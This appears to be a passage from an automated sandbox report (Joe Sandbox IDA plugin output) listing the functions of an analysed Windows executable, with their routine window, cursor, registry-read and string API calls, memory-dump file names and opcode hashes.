Part of subcall function 0044CFC9: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 0044D094
Part of subcall function 0044CFC9: SysFreeString.OLEAUT32(00000000), ref: 0044D0C1

VariantClear.OLEAUT32(0000000C), ref: 0044D3B5

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Variant$ChangeClearFreeH_prologStringTypelstrlen
String ID:
API String ID: 2273458292-0
Opcode ID: aa70419de3d55278bb422ebf33329e1549425c848121c43f177db56f50245422
Instruction ID: e4b6918c468d56d39b267c1d90e2d8883b789b1940e56973911aecc4db5786f9
Opcode Fuzzy Hash: aa70419de3d55278bb422ebf33329e1549425c848121c43f177db56f50245422
Instruction Fuzzy Hash: 7171C071D0020AEBEF10DFA5C885AAEBBB1FF05350F14816AF8059B255D738E941CBA9

Function 0044FD5A Relevance: 7.7, APIs: 5, Instructions: 152stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044FD5F
lstrcmpA.KERNEL32(00000000,00000000,00000001,0014000C,00000000), ref: 0044FE13
lstrcmpA.KERNEL32(?,00000000), ref: 0044FE31
lstrcmpA.KERNEL32(?,00000000,?), ref: 0044FE5F

Part of subcall function 0043918A: GlobalFlags.KERNEL32(?), ref: 00439194
Part of subcall function 0043918A: GlobalUnlock.KERNEL32(?), ref: 004391AB
Part of subcall function 0043918A: GlobalFree.KERNEL32(?), ref: 004391B6

GlobalLock.KERNEL32(?,?,?,00000000), ref: 0044FD89

Part of subcall function 0042CC5E: __EH_prolog.LIBCMT ref: 0042CC63

Part of subcall function 0042CECE: PrintDlgA.COMDLG32(?,0044FF09,00000001,0014000C,00000000,?,?,00000000), ref: 0042CED8

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Global$lstrcmp$H_prolog$FlagsFreeLockPrintUnlock
String ID:
API String ID: 2564375162-0
Opcode ID: 885989124e2d0b450b6b696d1506f8cf042cc9fe53985527a1f9d0d50db230d7
Instruction ID: 1e2dbbd96b45fb330f1b7dc418b52d949999394d5457bd8611ec3911c5a9c643
Opcode Fuzzy Hash: 885989124e2d0b450b6b696d1506f8cf042cc9fe53985527a1f9d0d50db230d7
Instruction Fuzzy Hash: 7F51BF31A00216EBEB14EF75C885FAEB7B5FF05304F50806EE409A3252DB38AE49DB54

Function 0042093C Relevance: 7.6, APIs: 5, Instructions: 150COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 0042099A
GetFileType.KERNEL32(?,?,00000000), ref: 00420A45
GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00420AA8
GetFileType.KERNEL32(00000000,?,00000000), ref: 00420AB6
SetHandleCount.KERNEL32 ref: 00420AED

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: bea3bd96608500b1f164a103109124979f66aaddeb5566aeab180af21cedf792
Instruction ID: 9035ccc1d3d31d2805598a16277772d46bf3aec1f5573b3a52eb8011ffb8b151
Opcode Fuzzy Hash: bea3bd96608500b1f164a103109124979f66aaddeb5566aeab180af21cedf792
Instruction Fuzzy Hash: 945129717047258FD710CF28E85476A7BE0AB21328FA4867EC5928B2E3E778D845C70A

Function 0044E630 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 0044E6C8
MulDiv.KERNEL32(?,?,?), ref: 0044E6DA
SetRect.USER32(?,00000008,00000008,?,-0000000B), ref: 0044E6F8
OffsetRect.USER32(?,?,?), ref: 0044E731
OffsetRect.USER32(?,?,00000000), ref: 0044E742

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Offset
String ID:
API String ID: 3858320380-0
Opcode ID: d4d66cbde3614bda2108ee674026b9cf1b6aa42e35441ea87889c0cb0000f1c5
Instruction ID: a68bf8ff1290a93e24e52be595561b86133392cae4271045a1ce1c40fc4c7643
Opcode Fuzzy Hash: d4d66cbde3614bda2108ee674026b9cf1b6aa42e35441ea87889c0cb0000f1c5
Instruction Fuzzy Hash: B1416971600A05EFE724CF6DC984A6ABBF6FF98300F058A2DE88AD7655D630F9058B54

Function 00413CF2 Relevance: 7.6, APIs: 5, Instructions: 127windowthreadCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413CF7
SendMessageA.USER32(?,00000138,?,?), ref: 00413D91
GetBkColor.GDI32(?), ref: 00413D9A
GetTextColor.GDI32(?), ref: 00413DA6
GetThreadLocale.KERNEL32(0000F1C0), ref: 00413E35

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Color$H_prologLocaleMessageSendTextThread
String ID:
API String ID: 741590120-0
Opcode ID: 5294e2eb9fb4a2d59876c72547906129a1c861950df66165a27a3e3b99725699
Instruction ID: 2036218fd893b67d6cb3c318f4516e6a01d480d130fee24ab8d042fd423e17a9
Opcode Fuzzy Hash: 5294e2eb9fb4a2d59876c72547906129a1c861950df66165a27a3e3b99725699
Instruction Fuzzy Hash: 48518071810705DFCB20DF25C8405EAB7F0FF44311F10895EE86A9B6A1E7B8AA81CB59

Function 00402C10 Relevance: 7.6, APIs: 5, Instructions: 125windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 00402C48
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00402C61
SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00402C7A
SendMessageA.USER32(?,00001036,00000000,00000000), ref: 00402C8A
GetClientRect.USER32(?,?), ref: 00402CA2

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: LongMessageSendWindow$ClientRect
String ID:
API String ID: 1757199185-0
Opcode ID: 778c56235acfc10e1aef1936fb929ddf5b4a8d3c3faafa86f0a867dbbefc451f
Instruction ID: eef4c5081dd149429357eda55a669f3f6ea83ce8145cf1ed3e7939e55f7354f0
Opcode Fuzzy Hash: 778c56235acfc10e1aef1936fb929ddf5b4a8d3c3faafa86f0a867dbbefc451f
Instruction Fuzzy Hash: 3F412470748311BBE224DF15CC56F2F73A4ABC4B24F508B1DF1666B2D0CBB8A9058B5A

Function 0043A051 Relevance: 7.6, APIs: 5, Instructions: 118COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043A056

Part of subcall function 00438C2C: __EH_prolog.LIBCMT ref: 00438C31
Part of subcall function 00438C2C: GetWindowDC.USER32(?,?,?,0043A085,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00438C5A

Part of subcall function 004385CE: SetMapMode.GDI32(?,?), ref: 004385E7
Part of subcall function 004385CE: SetMapMode.GDI32(?,?), ref: 004385F5

LPtoDP.GDI32(?,?,00000001), ref: 0043A0AE
LPtoDP.GDI32(?,?,00000001), ref: 0043A0C6
LPtoDP.GDI32(?,?,00000001), ref: 0043A0DE
InvalidateRect.USER32(?,00000000,00000001), ref: 0043A16C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: H_prologMode$InvalidateRectWindow
String ID:
API String ID: 2422810626-0
Opcode ID: 87c31eb13c5a8f027849554b8135fff1cb61ce0f2a429f49fc652c9f9a697ca2
Instruction ID: 51a93006b1ac1e00985406cacf70c8d84a2f86f71370cb4308d9c2832eff6b09
Opcode Fuzzy Hash: 87c31eb13c5a8f027849554b8135fff1cb61ce0f2a429f49fc652c9f9a697ca2
Instruction Fuzzy Hash: 43411470640B189FCB24DF6AC880A9AF7F5FF48314F10982EE58697760D7B5E851CB14

Function 0043F2D4 Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,00000001,00000001), ref: 0043F34F
InflateRect.USER32(?), ref: 0043F38B
GetWindowRect.USER32(?,?), ref: 0043F394
GetParent.USER32(?), ref: 0043F39D
EqualRect.USER32(?,?), ref: 0043F3BC

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Inflate$EqualParentWindow
String ID:
API String ID: 596032063-0
Opcode ID: b88c011418e4bd5d8135e6923121b2db9ad680192fd623037a7a33b1b2d78ff2
Instruction ID: 0f90a9aba439c6294e6cafba59281715702c06f68654a6779d5d6d808b57d019
Opcode Fuzzy Hash: b88c011418e4bd5d8135e6923121b2db9ad680192fd623037a7a33b1b2d78ff2
Instruction Fuzzy Hash: 29318B72E00219ABCF04DFA5DC41ABE77B9BB8C300F04943AF906E7251EA78D9098B14

Function 0043FF1D Relevance: 7.6, APIs: 5, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0043FF2A
GetKeyState.USER32(00000011), ref: 0043FF32
ScreenToClient.USER32(?,?), ref: 0043FFCF
ClientToScreen.USER32(?,?), ref: 0044000E
SetCursorPos.USER32(?,?), ref: 0044001A

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ClientCursorScreen$State
String ID:
API String ID: 3982492586-0
Opcode ID: 274772e2406be21cf26a6de4d0afebbae1cc4a886d64e5771c16cfd0bae8f892
Instruction ID: 822405419487463676883069bf6fb9242b493df303d1468900995cb69ad27c05
Opcode Fuzzy Hash: 274772e2406be21cf26a6de4d0afebbae1cc4a886d64e5771c16cfd0bae8f892
Instruction Fuzzy Hash: E5310A31A00604EFDB288F68D945BAEB7B6EB49310F64853FF502C62A1D7789D45CB09

Function 0043E2BE Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

RedrawWindow.USER32(00000041,?,00000000,00000041), ref: 0043E2D8
InflateRect.USER32(?,000000FF,000000FF), ref: 0043E324

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: InflateRectRedrawWindow
String ID:
API String ID: 3190756164-0
Opcode ID: ea60b3c0cad3bc54582d78bb2d2e22430ed5a6ca4c85591e35eaa7a27c5e4794
Instruction ID: a1a38bd20e68c7daff2b962d22115a6b603fdba7bc2c1547b5ddd9b01967d554
Opcode Fuzzy Hash: ea60b3c0cad3bc54582d78bb2d2e22430ed5a6ca4c85591e35eaa7a27c5e4794
Instruction Fuzzy Hash: BB318171E0021EABCF01DF95DC84CBE7769FB48364724063AF931A32E0EA75A8558B19

Function 00432F25 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00432F2A
GetTopWindow.USER32(?), ref: 00432F51
GetDlgCtrlID.USER32(00000000), ref: 00432F66
SendMessageA.USER32(?,00000087,00000000,00000000), ref: 00432FBF
GetWindow.USER32(00000000,00000002), ref: 00432FFA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$CtrlH_prologMessageSend
String ID:
API String ID: 4125289812-0
Opcode ID: 23669533e75f7264c7b0809e4e60968a05a52e720b2755ca19db90666e9f3d29
Instruction ID: 69ec04dd29437770c597b2f2860a354a073dac4bc35a531699dbde2ce3308c07
Opcode Fuzzy Hash: 23669533e75f7264c7b0809e4e60968a05a52e720b2755ca19db90666e9f3d29
Instruction Fuzzy Hash: 5131D431800258ABCB26EFA5CD95DEEBB74EF59318F20162FF411E3251E7788E40DA58

Function 00449DA0 Relevance: 7.6, APIs: 5, Instructions: 89registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00449DA5
RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,00000000,?,?,00000001,?,00000000,004360DE,?,?,?,0046B6B0), ref: 00449DFC
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000001,?,00000000,004360DE,?,?,?,0046B6B0), ref: 00449E1F
RegCloseKey.ADVAPI32(?,?,00000001,?,00000000,004360DE,?,?,?,0046B6B0), ref: 00449E30
GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 00449E8A

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: QueryValue$CloseH_prologPrivateProfileString
String ID:
API String ID: 1022837590-0
Opcode ID: f08565cdf0383e18e386e31d08eaed9ede75eff00e5e484e9e86381479629f93
Instruction ID: 49521331e747085b60859fe4f0057570cd45d89984c0983cf536d1feb7e776d2
Opcode Fuzzy Hash: f08565cdf0383e18e386e31d08eaed9ede75eff00e5e484e9e86381479629f93
Instruction Fuzzy Hash: D4316531900109EBDF01DF91DC808EFBB79EF48314F20812BF925A61A0D7759E56EB69

Function 0042D182 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042D187
GetParent.USER32(?), ref: 0042D1C4
SendMessageA.USER32(?,00000464,00000104,00000000), ref: 0042D1EC
GetParent.USER32(?), ref: 0042D215
SendMessageA.USER32(?,00000465,00000104,00000000), ref: 0042D232

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageParentSend$H_prolog
String ID:
API String ID: 1056721960-0
Opcode ID: af7392ec68c0366e8895689a7131b9cbd7da7f1cca1dda92680947dcd4677100
Instruction ID: e48e1fd62a18d3c0d049bbfd2c85a747fc5a892c62e0477dc9564cac62722193
Opcode Fuzzy Hash: af7392ec68c0366e8895689a7131b9cbd7da7f1cca1dda92680947dcd4677100
Instruction Fuzzy Hash: 19318170A00225EBCB14EBA1DC55EAEB774FF50358FA0457EE421A71E1DB389D05CB68

Function 00428740 Relevance: 7.6, APIs: 5, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cd432bd71ef62bdf0fbab7f9b80bb37fb5fd5c82925d75364fa80f59f32bc9e
Instruction ID: 16f40c97c02397ae26d9446b422691809f99159e5fa7f5f76114f325314b875d
Opcode Fuzzy Hash: 1cd432bd71ef62bdf0fbab7f9b80bb37fb5fd5c82925d75364fa80f59f32bc9e
Instruction Fuzzy Hash: F631C0756922218FD350DF18F825A2673A1F780711F6181BFE891C7262E7B6488DCF1A

Function 0044521A Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 00445594: GetParent.USER32(?), ref: 0044559E
Part of subcall function 00445594: GetParent.USER32(00000000), ref: 004455A1

GetWindowLongA.USER32(?,000000EC), ref: 00445258
RedrawWindow.USER32(?,00000000,00000000,00000081,?,?,?,?,?,0044531A,?), ref: 004452A5
SetWindowLongA.USER32(?,000000EC,00000000), ref: 004452B4
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137,?,?,?,?,?,0044531A,?), ref: 004452CA
GetClientRect.USER32(?,?), ref: 004452E0

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$LongParent$ClientRectRedraw
String ID:
API String ID: 556606033-0
Opcode ID: c236fca6ab36a87305ad935e6aa9db2f8974431748ab9b3f1a3abbb403672e58
Instruction ID: 1078eee8fff273e071a18e6428c47f981e264cb52ad1c60f26b31093a26664a3
Opcode Fuzzy Hash: c236fca6ab36a87305ad935e6aa9db2f8974431748ab9b3f1a3abbb403672e58
Instruction Fuzzy Hash: 85118172104B04AFFB206FA5EC84E7BB75ABB80351F204A3FF152561A2DBB54C418A59

Function 0043FB31 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0044B56B: EnterCriticalSection.KERNEL32(0046D470,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5A6
Part of subcall function 0044B56B: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5B8
Part of subcall function 0044B56B: LeaveCriticalSection.KERNEL32(0046D470,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5C1
Part of subcall function 0044B56B: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113,0043427A), ref: 0044B5D3

SetCursor.USER32(00000009), ref: 0043FB7A
LoadCursorA.USER32(?), ref: 0043FBC8
LoadCursorA.USER32(00000000,00007F85), ref: 0043FBDA
SetCursor.USER32(00000000,00000009), ref: 0043FBF0
DestroyCursor.USER32(00000000), ref: 0043FBFB

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Cursor$CriticalSection$EnterLoad$DestroyInitializeLeave
String ID:
API String ID: 900973665-0
Opcode ID: b5cc53361759b92453331fec053d7d8dd15df1f9d2be62342baf5e642dce5931
Instruction ID: 4d0a5fa10ac941fc5b77b4d80fe225f2a74e9321d8b1abe5613ed07c89f83205
Opcode Fuzzy Hash: b5cc53361759b92453331fec053d7d8dd15df1f9d2be62342baf5e642dce5931
Instruction Fuzzy Hash: 7411E1B1E042059BEB209B55ECA5E2BB65DD78E315F102437E504C7262EABCF809CB1E

Function 00432226 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00432234
GetWindow.USER32(?,00000005), ref: 00432253
GetWindowRect.USER32(00000000,?), ref: 00432260

Part of subcall function 00438A2E: ScreenToClient.USER32(?,q"C), ref: 00438A42
Part of subcall function 00438A2E: ScreenToClient.USER32(?,?), ref: 00438A4B

